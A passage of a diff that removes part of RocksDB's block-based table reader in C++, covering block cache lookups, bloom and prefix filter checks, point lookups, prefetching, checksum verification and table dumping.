-        input_iter->SetStatus(Status::Incomplete("no blocking io"));
-        return input_iter;
-      } else {
-        return NewErrorInternalIterator(Status::Incomplete("no blocking io"));
-      }
-    }
-    std::unique_ptr<Block> block_value;
-    s = ReadBlockFromFile(rep->file.get(), nullptr /* prefetch_buffer */,
-                          rep->footer, ro, handle, &block_value, rep->ioptions,
-                          true /* compress */, compression_dict,
-                          rep->persistent_cache_options, rep->global_seqno,
-                          rep->table_options.read_amp_bytes_per_bit);
-    if (s.ok()) {
-      block.value = block_value.release();
-    }
-  }
-
-  InternalIterator* iter;
-  if (s.ok()) {
-    assert(block.value != nullptr);
-    iter = block.value->NewIterator(&rep->internal_comparator, input_iter, true,
-                                    rep->ioptions.statistics);
-    if (block.cache_handle != nullptr) {
-      iter->RegisterCleanup(&ReleaseCachedEntry, block_cache,
-                            block.cache_handle);
-    } else {
-      iter->RegisterCleanup(&DeleteHeldResource<Block>, block.value, nullptr);
-    }
-  } else {
-    assert(block.value == nullptr);
-    if (input_iter != nullptr) {
-      input_iter->SetStatus(s);
-      iter = input_iter;
-    } else {
-      iter = NewErrorInternalIterator(s);
-    }
-  }
-  return iter;
-}
-
-Status BlockBasedTable::MaybeLoadDataBlockToCache(
-    FilePrefetchBuffer* prefetch_buffer, Rep* rep, const ReadOptions& ro,
-    const BlockHandle& handle, Slice compression_dict,
-    CachableEntry<Block>* block_entry, bool is_index) {
-  assert(block_entry != nullptr);
-  const bool no_io = (ro.read_tier == kBlockCacheTier);
-  Cache* block_cache = rep->table_options.block_cache.get();
-  Cache* block_cache_compressed =
-      rep->table_options.block_cache_compressed.get();
-
-  // If either block cache is enabled, we'll try to read from it.
-  Status s;
-  if (block_cache != nullptr || block_cache_compressed != nullptr) {
-    Statistics* statistics = rep->ioptions.statistics;
-    char cache_key[kMaxCacheKeyPrefixSize + kMaxVarint64Length];
-    char compressed_cache_key[kMaxCacheKeyPrefixSize + kMaxVarint64Length];
-    Slice key, /* key to the block cache */
-        ckey /* key to the compressed block cache */;
-
-    // create key for block cache
-    if (block_cache != nullptr) {
-      key = GetCacheKey(rep->cache_key_prefix, rep->cache_key_prefix_size,
-                        handle, cache_key);
-    }
-
-    if (block_cache_compressed != nullptr) {
-      ckey = GetCacheKey(rep->compressed_cache_key_prefix,
-                         rep->compressed_cache_key_prefix_size, handle,
-                         compressed_cache_key);
-    }
-
-    s = GetDataBlockFromCache(
-        key, ckey, block_cache, block_cache_compressed, rep->ioptions, ro,
-        block_entry, rep->table_options.format_version, compression_dict,
-        rep->table_options.read_amp_bytes_per_bit, is_index);
-
-    if (block_entry->value == nullptr && !no_io && ro.fill_cache) {
-      std::unique_ptr<Block> raw_block;
-      {
-        StopWatch sw(rep->ioptions.env, statistics, READ_BLOCK_GET_MICROS);
-        s = ReadBlockFromFile(
-            rep->file.get(), prefetch_buffer, rep->footer, ro, handle,
-            &raw_block, rep->ioptions, block_cache_compressed == nullptr,
-            compression_dict, rep->persistent_cache_options, rep->global_seqno,
-            rep->table_options.read_amp_bytes_per_bit);
-      }
-
-      if (s.ok()) {
-        s = PutDataBlockToCache(
-            key, ckey, block_cache, block_cache_compressed, ro, rep->ioptions,
-            block_entry, raw_block.release(), rep->table_options.format_version,
-            compression_dict, rep->table_options.read_amp_bytes_per_bit,
-            is_index,
-            is_index &&
-                    rep->table_options
-                        .cache_index_and_filter_blocks_with_high_priority
-                ? Cache::Priority::HIGH
-                : Cache::Priority::LOW);
-      }
-    }
-  }
-  assert(s.ok() || block_entry->value == nullptr);
-  return s;
-}
-
-BlockBasedTable::BlockEntryIteratorState::BlockEntryIteratorState(
-    BlockBasedTable* table, const ReadOptions& read_options,
-    const InternalKeyComparator* icomparator, bool skip_filters, bool is_index,
-    std::unordered_map<uint64_t, CachableEntry<Block>>* block_map)
-    : TwoLevelIteratorState(table->rep_->ioptions.prefix_extractor != nullptr),
-      table_(table),
-      read_options_(read_options),
-      icomparator_(icomparator),
-      skip_filters_(skip_filters),
-      is_index_(is_index),
-      block_map_(block_map) {}
-
-InternalIterator*
-BlockBasedTable::BlockEntryIteratorState::NewSecondaryIterator(
-    const Slice& index_value) {
-  // Return a block iterator on the index partition
-  BlockHandle handle;
-  Slice input = index_value;
-  Status s = handle.DecodeFrom(&input);
-  auto rep = table_->rep_;
-  if (block_map_) {
-    auto block = block_map_->find(handle.offset());
-    // This is a possible scenario since block cache might not have had space
-    // for the partition
-    if (block != block_map_->end()) {
-      PERF_COUNTER_ADD(block_cache_hit_count, 1);
-      RecordTick(rep->ioptions.statistics, BLOCK_CACHE_INDEX_HIT);
-      RecordTick(rep->ioptions.statistics, BLOCK_CACHE_HIT);
-      Cache* block_cache = rep->table_options.block_cache.get();
-      assert(block_cache);
-      RecordTick(rep->ioptions.statistics, BLOCK_CACHE_BYTES_READ,
-                 block_cache->GetUsage(block->second.cache_handle));
-      return block->second.value->NewIterator(
-          &rep->internal_comparator, nullptr, true, rep->ioptions.statistics);
-    }
-  }
-  return NewDataBlockIterator(rep, read_options_, handle, nullptr, is_index_,
-                              s);
-}
-
-bool BlockBasedTable::BlockEntryIteratorState::PrefixMayMatch(
-    const Slice& internal_key) {
-  if (read_options_.total_order_seek || skip_filters_) {
-    return true;
-  }
-  return table_->PrefixMayMatch(internal_key);
-}
-
-bool BlockBasedTable::BlockEntryIteratorState::KeyReachedUpperBound(
-    const Slice& internal_key) {
-  bool reached_upper_bound = read_options_.iterate_upper_bound != nullptr &&
-                             icomparator_ != nullptr &&
-                             icomparator_->user_comparator()->Compare(
-                                 ExtractUserKey(internal_key),
-                                 *read_options_.iterate_upper_bound) >= 0;
-  TEST_SYNC_POINT_CALLBACK(
-      "BlockBasedTable::BlockEntryIteratorState::KeyReachedUpperBound",
-      &reached_upper_bound);
-  return reached_upper_bound;
-}
-
-// This will be broken if the user specifies an unusual implementation
-// of Options.comparator, or if the user specifies an unusual
-// definition of prefixes in BlockBasedTableOptions.filter_policy.
-// In particular, we require the following three properties:
-//
-// 1) key.starts_with(prefix(key))
-// 2) Compare(prefix(key), key) <= 0.
-// 3) If Compare(key1, key2) <= 0, then Compare(prefix(key1), prefix(key2)) <= 0
-//
-// Otherwise, this method guarantees no I/O will be incurred.
-//
-// REQUIRES: this method shouldn't be called while the DB lock is held.
-bool BlockBasedTable::PrefixMayMatch(const Slice& internal_key) {
-  if (!rep_->filter_policy) {
-    return true;
-  }
-
-  assert(rep_->ioptions.prefix_extractor != nullptr);
-  auto user_key = ExtractUserKey(internal_key);
-  if (!rep_->ioptions.prefix_extractor->InDomain(user_key) ||
-      rep_->table_properties->prefix_extractor_name.compare(
-          rep_->ioptions.prefix_extractor->Name()) != 0) {
-    return true;
-  }
-  auto prefix = rep_->ioptions.prefix_extractor->Transform(user_key);
-
-  bool may_match = true;
-  Status s;
-
-  // First, try check with full filter
-  auto filter_entry = GetFilter();
-  FilterBlockReader* filter = filter_entry.value;
-  if (filter != nullptr) {
-    if (!filter->IsBlockBased()) {
-      const Slice* const const_ikey_ptr = &internal_key;
-      may_match =
-          filter->PrefixMayMatch(prefix, kNotValid, false, const_ikey_ptr);
-    } else {
-      InternalKey internal_key_prefix(prefix, kMaxSequenceNumber, kTypeValue);
-      auto internal_prefix = internal_key_prefix.Encode();
-
-      // To prevent any io operation in this method, we set `read_tier` to make
-      // sure we always read index or filter only when they have already been
-      // loaded to memory.
-      ReadOptions no_io_read_options;
-      no_io_read_options.read_tier = kBlockCacheTier;
-
-      // Then, try find it within each block
-      unique_ptr<InternalIterator> iiter(NewIndexIterator(no_io_read_options));
-      iiter->Seek(internal_prefix);
-
-      if (!iiter->Valid()) {
-        // we're past end of file
-        // if it's incomplete, it means that we avoided I/O
-        // and we're not really sure that we're past the end
-        // of the file
-        may_match = iiter->status().IsIncomplete();
-      } else if (ExtractUserKey(iiter->key())
-                     .starts_with(ExtractUserKey(internal_prefix))) {
-        // we need to check for this subtle case because our only
-        // guarantee is that "the key is a string >= last key in that data
-        // block" according to the doc/table_format.txt spec.
-        //
-        // Suppose iiter->key() starts with the desired prefix; it is not
-        // necessarily the case that the corresponding data block will
-        // contain the prefix, since iiter->key() need not be in the
-        // block.  However, the next data block may contain the prefix, so
-        // we return true to play it safe.
-        may_match = true;
-      } else if (filter->IsBlockBased()) {
-        // iiter->key() does NOT start with the desired prefix.  Because
-        // Seek() finds the first key that is >= the seek target, this
-        // means that iiter->key() > prefix.  Thus, any data blocks coming
-        // after the data block corresponding to iiter->key() cannot
-        // possibly contain the key.  Thus, the corresponding data block
-        // is the only on could potentially contain the prefix.
-        Slice handle_value = iiter->value();
-        BlockHandle handle;
-        s = handle.DecodeFrom(&handle_value);
-        assert(s.ok());
-        may_match = filter->PrefixMayMatch(prefix, handle.offset());
-      }
-    }
-  }
-
-  Statistics* statistics = rep_->ioptions.statistics;
-  RecordTick(statistics, BLOOM_FILTER_PREFIX_CHECKED);
-  if (!may_match) {
-    RecordTick(statistics, BLOOM_FILTER_PREFIX_USEFUL);
-  }
-
-  // if rep_->filter_entry is not set, we should call Release(); otherwise
-  // don't call, in this case we have a local copy in rep_->filter_entry,
-  // it's pinned to the cache and will be released in the destructor
-  if (!rep_->filter_entry.IsSet()) {
-    filter_entry.Release(rep_->table_options.block_cache.get());
-  }
-
-  return may_match;
-}
-
-InternalIterator* BlockBasedTable::NewIterator(const ReadOptions& read_options,
-                                               Arena* arena,
-                                               bool skip_filters) {
-  return NewTwoLevelIterator(
-      new BlockEntryIteratorState(this, read_options,
-                                  &rep_->internal_comparator, skip_filters),
-      NewIndexIterator(read_options), arena);
-}
-
-InternalIterator* BlockBasedTable::NewRangeTombstoneIterator(
-    const ReadOptions& read_options) {
-  if (rep_->range_del_handle.IsNull()) {
-    // The block didn't exist, nullptr indicates no range tombstones.
-    return nullptr;
-  }
-  if (rep_->range_del_entry.cache_handle != nullptr) {
-    // We have a handle to an uncompressed block cache entry that's held for
-    // this table's lifetime. Increment its refcount before returning an
-    // iterator based on it since the returned iterator may outlive this table
-    // reader.
-    assert(rep_->range_del_entry.value != nullptr);
-    Cache* block_cache = rep_->table_options.block_cache.get();
-    assert(block_cache != nullptr);
-    if (block_cache->Ref(rep_->range_del_entry.cache_handle)) {
-      auto iter = rep_->range_del_entry.value->NewIterator(
-          &rep_->internal_comparator, nullptr /* iter */,
-          true /* total_order_seek */, rep_->ioptions.statistics);
-      iter->RegisterCleanup(&ReleaseCachedEntry, block_cache,
-                            rep_->range_del_entry.cache_handle);
-      return iter;
-    }
-  }
-  std::string str;
-  rep_->range_del_handle.EncodeTo(&str);
-  // The meta-block exists but isn't in uncompressed block cache (maybe because
-  // it is disabled), so go through the full lookup process.
-  return NewDataBlockIterator(rep_, read_options, Slice(str));
-}
-
-bool BlockBasedTable::FullFilterKeyMayMatch(const ReadOptions& read_options,
-                                            FilterBlockReader* filter,
-                                            const Slice& internal_key,
-                                            const bool no_io) const {
-  if (filter == nullptr || filter->IsBlockBased()) {
-    return true;
-  }
-  Slice user_key = ExtractUserKey(internal_key);
-  const Slice* const const_ikey_ptr = &internal_key;
-  if (filter->whole_key_filtering()) {
-    return filter->KeyMayMatch(user_key, kNotValid, no_io, const_ikey_ptr);
-  }
-  if (!read_options.total_order_seek && rep_->ioptions.prefix_extractor &&
-      rep_->table_properties->prefix_extractor_name.compare(
-          rep_->ioptions.prefix_extractor->Name()) == 0 &&
-      rep_->ioptions.prefix_extractor->InDomain(user_key) &&
-      !filter->PrefixMayMatch(
-          rep_->ioptions.prefix_extractor->Transform(user_key), kNotValid,
-          false, const_ikey_ptr)) {
-    return false;
-  }
-  return true;
-}
-
-Status BlockBasedTable::Get(const ReadOptions& read_options, const Slice& key,
-                            GetContext* get_context, bool skip_filters) {
-  Status s;
-  const bool no_io = read_options.read_tier == kBlockCacheTier;
-  CachableEntry<FilterBlockReader> filter_entry;
-  if (!skip_filters) {
-    filter_entry = GetFilter(/*prefetch_buffer*/ nullptr,
-                             read_options.read_tier == kBlockCacheTier);
-  }
-  FilterBlockReader* filter = filter_entry.value;
-
-  // First check the full filter
-  // If full filter not useful, Then go into each block
-  if (!FullFilterKeyMayMatch(read_options, filter, key, no_io)) {
-    RecordTick(rep_->ioptions.statistics, BLOOM_FILTER_USEFUL);
-  } else {
-    BlockIter iiter_on_stack;
-    auto iiter = NewIndexIterator(read_options, &iiter_on_stack);
-    std::unique_ptr<InternalIterator> iiter_unique_ptr;
-    if (iiter != &iiter_on_stack) {
-      iiter_unique_ptr.reset(iiter);
-    }
-
-    bool done = false;
-    for (iiter->Seek(key); iiter->Valid() && !done; iiter->Next()) {
-      Slice handle_value = iiter->value();
-
-      BlockHandle handle;
-      bool not_exist_in_filter =
-          filter != nullptr && filter->IsBlockBased() == true &&
-          handle.DecodeFrom(&handle_value).ok() &&
-          !filter->KeyMayMatch(ExtractUserKey(key), handle.offset(), no_io);
-
-      if (not_exist_in_filter) {
-        // Not found
-        // TODO: think about interaction with Merge. If a user key cannot
-        // cross one data block, we should be fine.
-        RecordTick(rep_->ioptions.statistics, BLOOM_FILTER_USEFUL);
-        break;
-      } else {
-        BlockIter biter;
-        NewDataBlockIterator(rep_, read_options, iiter->value(), &biter);
-
-        if (read_options.read_tier == kBlockCacheTier &&
-            biter.status().IsIncomplete()) {
-          // couldn't get block from block_cache
-          // Update Saver.state to Found because we are only looking for whether
-          // we can guarantee the key is not there when "no_io" is set
-          get_context->MarkKeyMayExist();
-          break;
-        }
-        if (!biter.status().ok()) {
-          s = biter.status();
-          break;
-        }
-
-        // Call the *saver function on each entry/block until it returns false
-        for (biter.Seek(key); biter.Valid(); biter.Next()) {
-          ParsedInternalKey parsed_key;
-          if (!ParseInternalKey(biter.key(), &parsed_key)) {
-            s = Status::Corruption(Slice());
-          }
-
-          if (!get_context->SaveValue(parsed_key, biter.value(), &biter)) {
-            done = true;
-            break;
-          }
-        }
-        s = biter.status();
-      }
-      if (done) {
-        // Avoid the extra Next which is expensive in two-level indexes
-        break;
-      }
-    }
-    if (s.ok()) {
-      s = iiter->status();
-    }
-  }
-
-  // if rep_->filter_entry is not set, we should call Release(); otherwise
-  // don't call, in this case we have a local copy in rep_->filter_entry,
-  // it's pinned to the cache and will be released in the destructor
-  if (!rep_->filter_entry.IsSet()) {
-    filter_entry.Release(rep_->table_options.block_cache.get());
-  }
-  return s;
-}
-
-Status BlockBasedTable::Prefetch(const Slice* const begin,
-                                 const Slice* const end) {
-  auto& comparator = rep_->internal_comparator;
-  // pre-condition
-  if (begin && end && comparator.Compare(*begin, *end) > 0) {
-    return Status::InvalidArgument(*begin, *end);
-  }
-
-  BlockIter iiter_on_stack;
-  auto iiter = NewIndexIterator(ReadOptions(), &iiter_on_stack);
-  std::unique_ptr<InternalIterator> iiter_unique_ptr;
-  if (iiter != &iiter_on_stack) {
-    iiter_unique_ptr = std::unique_ptr<InternalIterator>(iiter);
-  }
-
-  if (!iiter->status().ok()) {
-    // error opening index iterator
-    return iiter->status();
-  }
-
-  // indicates if we are on the last page that need to be pre-fetched
-  bool prefetching_boundary_page = false;
-
-  for (begin ? iiter->Seek(*begin) : iiter->SeekToFirst(); iiter->Valid();
-       iiter->Next()) {
-    Slice block_handle = iiter->value();
-
-    if (end && comparator.Compare(iiter->key(), *end) >= 0) {
-      if (prefetching_boundary_page) {
-        break;
-      }
-
-      // The index entry represents the last key in the data block.
-      // We should load this page into memory as well, but no more
-      prefetching_boundary_page = true;
-    }
-
-    // Load the block specified by the block_handle into the block cache
-    BlockIter biter;
-    NewDataBlockIterator(rep_, ReadOptions(), block_handle, &biter);
-
-    if (!biter.status().ok()) {
-      // there was an unexpected error while pre-fetching
-      return biter.status();
-    }
-  }
-
-  return Status::OK();
-}
-
-Status BlockBasedTable::VerifyChecksum() {
-  Status s;
-  // Check Meta blocks
-  std::unique_ptr<Block> meta;
-  std::unique_ptr<InternalIterator> meta_iter;
-  s = ReadMetaBlock(rep_, nullptr /* prefetch buffer */, &meta, &meta_iter);
-  if (s.ok()) {
-    s = VerifyChecksumInBlocks(meta_iter.get());
-    if (!s.ok()) {
-      return s;
-    }
-  } else {
-    return s;
-  }
-  // Check Data blocks
-  BlockIter iiter_on_stack;
-  InternalIterator* iiter = NewIndexIterator(ReadOptions(), &iiter_on_stack);
-  std::unique_ptr<InternalIterator> iiter_unique_ptr;
-  if (iiter != &iiter_on_stack) {
-    iiter_unique_ptr = std::unique_ptr<InternalIterator>(iiter);
-  }
-  if (!iiter->status().ok()) {
-    // error opening index iterator
-    return iiter->status();
-  }
-  s = VerifyChecksumInBlocks(iiter);
-  return s;
-}
-
-Status BlockBasedTable::VerifyChecksumInBlocks(InternalIterator* index_iter) {
-  Status s;
-  for (index_iter->SeekToFirst(); index_iter->Valid(); index_iter->Next()) {
-    s = index_iter->status();
-    if (!s.ok()) {
-      break;
-    }
-    BlockHandle handle;
-    Slice input = index_iter->value();
-    s = handle.DecodeFrom(&input);
-    if (!s.ok()) {
-      break;
-    }
-    BlockContents contents;
-    s = ReadBlockContents(rep_->file.get(), nullptr /* prefetch buffer */,
-                          rep_->footer, ReadOptions(), handle, &contents,
-                          rep_->ioptions, false /* decompress */,
-                          Slice() /*compression dict*/,
-                          rep_->persistent_cache_options);
-    if (!s.ok()) {
-      break;
-    }
-  }
-  return s;
-}
-
-bool BlockBasedTable::TEST_KeyInCache(const ReadOptions& options,
-                                      const Slice& key) {
-  std::unique_ptr<InternalIterator> iiter(NewIndexIterator(options));
-  iiter->Seek(key);
-  assert(iiter->Valid());
-  CachableEntry<Block> block;
-
-  BlockHandle handle;
-  Slice input = iiter->value();
-  Status s = handle.DecodeFrom(&input);
-  assert(s.ok());
-  Cache* block_cache = rep_->table_options.block_cache.get();
-  assert(block_cache != nullptr);
-
-  char cache_key_storage[kMaxCacheKeyPrefixSize + kMaxVarint64Length];
-  Slice cache_key =
-      GetCacheKey(rep_->cache_key_prefix, rep_->cache_key_prefix_size,
-                  handle, cache_key_storage);
-  Slice ckey;
-
-  s = GetDataBlockFromCache(
-      cache_key, ckey, block_cache, nullptr, rep_->ioptions, options, &block,
-      rep_->table_options.format_version,
-      rep_->compression_dict_block ? rep_->compression_dict_block->data
-                                   : Slice(),
-      0 /* read_amp_bytes_per_bit */);
-  assert(s.ok());
-  bool in_cache = block.value != nullptr;
-  if (in_cache) {
-    ReleaseCachedEntry(block_cache, block.cache_handle);
-  }
-  return in_cache;
-}
-
-// REQUIRES: The following fields of rep_ should have already been populated:
-//  1. file
-//  2. index_handle,
-//  3. options
-//  4. internal_comparator
-//  5. index_type
-Status BlockBasedTable::CreateIndexReader(
-    FilePrefetchBuffer* prefetch_buffer, IndexReader** index_reader,
-    InternalIterator* preloaded_meta_index_iter, int level) {
-  // Some old version of block-based tables don't have index type present in
-  // table properties. If that's the case we can safely use the kBinarySearch.
-  auto index_type_on_file = BlockBasedTableOptions::kBinarySearch;
-  if (rep_->table_properties) {
-    auto& props = rep_->table_properties->user_collected_properties;
-    auto pos = props.find(BlockBasedTablePropertyNames::kIndexType);
-    if (pos != props.end()) {
-      index_type_on_file = static_cast<BlockBasedTableOptions::IndexType>(
-          DecodeFixed32(pos->second.c_str()));
-    }
-  }
-
-  auto file = rep_->file.get();
-  const InternalKeyComparator* icomparator = &rep_->internal_comparator;
-  const Footer& footer = rep_->footer;
-  if (index_type_on_file == BlockBasedTableOptions::kHashSearch &&
-      rep_->ioptions.prefix_extractor == nullptr) {
-    ROCKS_LOG_WARN(rep_->ioptions.info_log,
-                   "BlockBasedTableOptions::kHashSearch requires "
-                   "options.prefix_extractor to be set."
-                   " Fall back to binary search index.");
-    index_type_on_file = BlockBasedTableOptions::kBinarySearch;
-  }
-
-  switch (index_type_on_file) {
-    case BlockBasedTableOptions::kTwoLevelIndexSearch: {
-      return PartitionIndexReader::Create(
-          this, file, prefetch_buffer, footer, footer.index_handle(),
-          rep_->ioptions, icomparator, index_reader,
-          rep_->persistent_cache_options, level);
-    }
-    case BlockBasedTableOptions::kBinarySearch: {
-      return BinarySearchIndexReader::Create(
-          file, prefetch_buffer, footer, footer.index_handle(), rep_->ioptions,
-          icomparator, index_reader, rep_->persistent_cache_options);
-    }
-    case BlockBasedTableOptions::kHashSearch: {
-      std::unique_ptr<Block> meta_guard;
-      std::unique_ptr<InternalIterator> meta_iter_guard;
-      auto meta_index_iter = preloaded_meta_index_iter;
-      if (meta_index_iter == nullptr) {
-        auto s =
-            ReadMetaBlock(rep_, prefetch_buffer, &meta_guard, &meta_iter_guard);
-        if (!s.ok()) {
-          // we simply fall back to binary search in case there is any
-          // problem with prefix hash index loading.
-          ROCKS_LOG_WARN(rep_->ioptions.info_log,
-                         "Unable to read the metaindex block."
-                         " Fall back to binary search index.");
-          return BinarySearchIndexReader::Create(
-              file, prefetch_buffer, footer, footer.index_handle(),
-              rep_->ioptions, icomparator, index_reader,
-              rep_->persistent_cache_options);
-        }
-        meta_index_iter = meta_iter_guard.get();
-      }
-
-      return HashIndexReader::Create(
-          rep_->internal_prefix_transform.get(), footer, file, prefetch_buffer,
-          rep_->ioptions, icomparator, footer.index_handle(), meta_index_iter,
-          index_reader, rep_->hash_index_allow_collision,
-          rep_->persistent_cache_options);
-    }
-    default: {
-      std::string error_message =
-          "Unrecognized index type: " + ToString(index_type_on_file);
-      return Status::InvalidArgument(error_message.c_str());
-    }
-  }
-}
-
-uint64_t BlockBasedTable::ApproximateOffsetOf(const Slice& key) {
-  unique_ptr<InternalIterator> index_iter(NewIndexIterator(ReadOptions()));
-
-  index_iter->Seek(key);
-  uint64_t result;
-  if (index_iter->Valid()) {
-    BlockHandle handle;
-    Slice input = index_iter->value();
-    Status s = handle.DecodeFrom(&input);
-    if (s.ok()) {
-      result = handle.offset();
-    } else {
-      // Strange: we can't decode the block handle in the index block.
-      // We'll just return the offset of the metaindex block, which is
-      // close to the whole file size for this case.
-      result = rep_->footer.metaindex_handle().offset();
-    }
-  } else {
-    // key is past the last key in the file. If table_properties is not
-    // available, approximate the offset by returning the offset of the
-    // metaindex block (which is right near the end of the file).
-    result = 0;
-    if (rep_->table_properties) {
-      result = rep_->table_properties->data_size;
-    }
-    // table_properties is not present in the table.
-    if (result == 0) {
-      result = rep_->footer.metaindex_handle().offset();
-    }
-  }
-  return result;
-}
-
-bool BlockBasedTable::TEST_filter_block_preloaded() const {
-  return rep_->filter != nullptr;
-}
-
-bool BlockBasedTable::TEST_index_reader_preloaded() const {
-  return rep_->index_reader != nullptr;
-}
-
-Status BlockBasedTable::GetKVPairsFromDataBlocks(
-    std::vector<KVPairBlock>* kv_pair_blocks) {
-  std::unique_ptr<InternalIterator> blockhandles_iter(
-      NewIndexIterator(ReadOptions()));
-
-  Status s = blockhandles_iter->status();
-  if (!s.ok()) {
-    // Cannot read Index Block
-    return s;
-  }
-
-  for (blockhandles_iter->SeekToFirst(); blockhandles_iter->Valid();
-       blockhandles_iter->Next()) {
-    s = blockhandles_iter->status();
-
-    if (!s.ok()) {
-      break;
-    }
-
-    std::unique_ptr<InternalIterator> datablock_iter;
-    datablock_iter.reset(
-        NewDataBlockIterator(rep_, ReadOptions(), blockhandles_iter->value()));
-    s = datablock_iter->status();
-
-    if (!s.ok()) {
-      // Error reading the block - Skipped
-      continue;
-    }
-
-    KVPairBlock kv_pair_block;
-    for (datablock_iter->SeekToFirst(); datablock_iter->Valid();
-         datablock_iter->Next()) {
-      s = datablock_iter->status();
-      if (!s.ok()) {
-        // Error reading the block - Skipped
-        break;
-      }
-      const Slice& key = datablock_iter->key();
-      const Slice& value = datablock_iter->value();
-      std::string key_copy = std::string(key.data(), key.size());
-      std::string value_copy = std::string(value.data(), value.size());
-
-      kv_pair_block.push_back(
-          std::make_pair(std::move(key_copy), std::move(value_copy)));
-    }
-    kv_pair_blocks->push_back(std::move(kv_pair_block));
-  }
-  return Status::OK();
-}
-
-Status BlockBasedTable::DumpTable(WritableFile* out_file) {
-  // Output Footer
-  out_file->Append(
-      "Footer Details:\n"
-      "--------------------------------------\n"
-      "  ");
-  out_file->Append(rep_->footer.ToString().c_str());
-  out_file->Append("\n");
-
-  // Output MetaIndex
-  out_file->Append(
-      "Metaindex Details:\n"
-      "--------------------------------------\n");
-  std::unique_ptr<Block> meta;
-  std::unique_ptr<InternalIterator> meta_iter;
-  Status s =
-      ReadMetaBlock(rep_, nullptr /* prefetch_buffer */, &meta, &meta_iter);
-  if (s.ok()) {
-    for (meta_iter->SeekToFirst(); meta_iter->Valid(); meta_iter->Next()) {
-      s = meta_iter->status();
-      if (!s.ok()) {
-        return s;
-      }
-      if (meta_iter->key() == rocksdb::kPropertiesBlock) {
-        out_file->Append("  Properties block handle: ");
-        out_file->Append(meta_iter->value().ToString(true).c_str());
-        out_file->Append("\n");
-      } else if (meta_iter->key() == rocksdb::kCompressionDictBlock) {
-        out_file->Append("  Compression dictionary block handle: ");
-        out_file->Append(meta_iter->value().ToString(true).c_str());
-        out_file->Append("\n");
-      } else if (strstr(meta_iter->key().ToString().c_str(),
-                        "filter.rocksdb.") != nullptr) {
-        out_file->Append("  Filter block handle: ");
-        out_file->Append(meta_iter->value().ToString(true).c_str());
-        out_file->Append("\n");
-      } else if (meta_iter->key() == rocksdb::kRangeDelBlock) {
-        out_file->Append("  Range deletion block handle: ");
-        out_file->Append(meta_iter->value().ToString(true).c_str());
-        out_file->Append("\n");
-      }
-    }
-    out_file->Append("\n");
-  } else {
-    return s;
-  }
-
-  // Output TableProperties
-  const rocksdb::TableProperties* table_properties;
-  table_properties = rep_->table_properties.get();
-
-  if (table_properties != nullptr) {
-    out_file->Append(
-        "Table Properties:\n"
-        "--------------------------------------\n"
-        "  ");
-    out_file->Append(table_properties->ToString("\n  ", ": ").c_str());
-    out_file->Append("\n");
-  }
-
-  // Output Filter blocks
-  if (!rep_->filter && !table_properties->filter_policy_name.empty()) {
-    // Support only BloomFilter as off now
-    rocksdb::BlockBasedTableOptions table_options;
-    table_options.filter_policy.reset(rocksdb::NewBloomFilterPolicy(1));
-    if (table_properties->filter_policy_name.compare(
-            table_options.filter_policy->Name()) == 0) {
-      std::string filter_block_key = kFilterBlockPrefix;
-      filter_block_key.append(table_properties->filter_policy_name);
-      BlockHandle handle;
-      if (FindMetaBlock(meta_iter.get(), filter_block_key, &handle).ok()) {
-        BlockContents block;
-        if (ReadBlockContents(rep_->file.get(), nullptr /* prefetch_buffer */,
-                              rep_->footer, ReadOptions(), handle, &block,
-                              rep_->ioptions, false /*decompress*/,
-                              Slice() /*compression dict*/,
-                              rep_->persistent_cache_options)
-                .ok()) {
-          rep_->filter.reset(new BlockBasedFilterBlockReader(
-              rep_->ioptions.prefix_extractor, table_options,
-              table_options.whole_key_filtering, std::move(block),
-              rep_->ioptions.statistics));
-        }
-      }
-    }
-  }
-  if (rep_->filter) {
-    out_file->Append(
-        "Filter Details:\n"
-        "--------------------------------------\n"
-        "  ");
-    out_file->Append(rep_->filter->ToString().c_str());
-    out_file->Append("\n");
-  }
-
-  // Output Index block
-  s = DumpIndexBlock(out_file);
-  if (!s.ok()) {
-    return s;
-  }
-
-  // Output compression dictionary
-  if (rep_->compression_dict_block != nullptr) {
-    auto compression_dict = rep_->compression_dict_block->data;
-    out_file->Append(
-        "Compression Dictionary:\n"
-        "--------------------------------------\n");
-    out_file->Append("  size (bytes): ");
-    out_file->Append(rocksdb::ToString(compression_dict.size()));
-    out_file->Append("\n\n");
-    out_file->Append("  HEX    ");
-    out_file->Append(compression_dict.ToString(true).c_str());
-    out_file->Append("\n\n");
-  }
-
-  // Output range deletions block
-  auto* range_del_iter = NewRangeTombstoneIterator(ReadOptions());
-  if (range_del_iter != nullptr) {
-    range_del_iter->SeekToFirst();
-    if (range_del_iter->Valid()) {
-      out_file->Append(
-          "Range deletions:\n"
-          "--------------------------------------\n"
-          "  ");
-      for (; range_del_iter->Valid(); range_del_iter->Next()) {
-        DumpKeyValue(range_del_iter->key(), range_del_iter->value(), out_file);
-      }
-      out_file->Append("\n");
-    }
-    delete range_del_iter;
-  }
-  // Output Data blocks
-  s = DumpDataBlocks(out_file);
-
-  return s;
-}
-
-void BlockBasedTable::Close() {
-  if (rep_->closed) {
-    return;
-  }
-  rep_->filter_entry.Release(rep_->table_options.block_cache.get());
-  rep_->index_entry.Release(rep_->table_options.block_cache.get());
-  rep_->range_del_entry.Release(rep_->table_options.block_cache.get());
-  // cleanup index and filter blocks to avoid accessing dangling pointer
-  if (!rep_->table_options.no_block_cache) {
-    char cache_key[kMaxCacheKeyPrefixSize + kMaxVarint64Length];
-    // Get the filter block key
-    auto key = GetCacheKey(rep_->cache_key_prefix, rep_->cache_key_prefix_size,
-                           rep_->filter_handle, cache_key);
-    rep_->table_options.block_cache.get()->Erase(key);
-    // Get the index block key
-    key = GetCacheKeyFromOffset(rep_->cache_key_prefix,
-                                rep_->cache_key_prefix_size,
-                                rep_->dummy_index_reader_offset, cache_key);
-    rep_->table_options.block_cache.get()->Erase(key);
-  }
-  rep_->closed = true;
-}
-
-Status BlockBasedTable::DumpIndexBlock(WritableFile* out_file) {
-  out_file->Append(
-      "Index Details:\n"
-      "--------------------------------------\n");
-
-  std::unique_ptr<InternalIterator> blockhandles_iter(
-      NewIndexIterator(ReadOptions()));
-  Status s = blockhandles_iter->status();
-  if (!s.ok()) {
-    out_file->Append("Can not read Index Block \n\n");
-    return s;
-  }
-
-  out_file->Append("  Block key hex dump: Data block handle\n");
-  out_file->Append("  Block key ascii\n\n");
-  for (blockhandles_iter->SeekToFirst(); blockhandles_iter->Valid();
-       blockhandles_iter->Next()) {
-    s = blockhandles_iter->status();
-    if (!s.ok()) {
-      break;
-    }
-    Slice key = blockhandles_iter->key();
-    InternalKey ikey;
-    ikey.DecodeFrom(key);
-
-    out_file->Append("  HEX    ");
